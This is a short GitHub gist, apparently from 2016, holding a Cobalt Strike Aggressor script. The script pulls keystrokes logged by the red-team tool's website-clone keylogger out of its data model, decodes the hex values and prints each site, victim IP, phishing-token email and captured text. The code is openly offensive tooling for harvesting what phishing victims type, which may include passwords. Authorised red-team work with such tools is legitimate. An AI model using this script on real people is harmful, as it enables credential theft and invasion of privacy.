@rsmudge
Created August 10, 2016 19:44
Shows how to pull keystrokes captured by the website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.

# convert comma separated keystroke values into a string.
sub toString {
	local('@temp');
	@temp = split(",", $1);

	# discard the first element; only the remaining values are decoded
	shift(@temp);

	# each remaining value is a hex character code
	return join("", map({
		return chr(parseNumber($1, 16, 10));
	}, @temp));
}

# grab our keystrokes
command pull {
	local('$entry $site $ip $keystrokes $token $email $data');

	# walk the weblog entries and keep only the keylogger hits
	foreach $entry (data_query("weblog")) {
		if ($entry[0] eq "keylogger_hit") {
			($null, $site, $ip, $keystrokes, $token) = $entry;
			$email = tokenToEmail($token);
			$data = toString($keystrokes);

			# $[20] pads the ip and email columns to 20 characters
			println("$site $[20]ip $[20]email $data");
		}
	}
}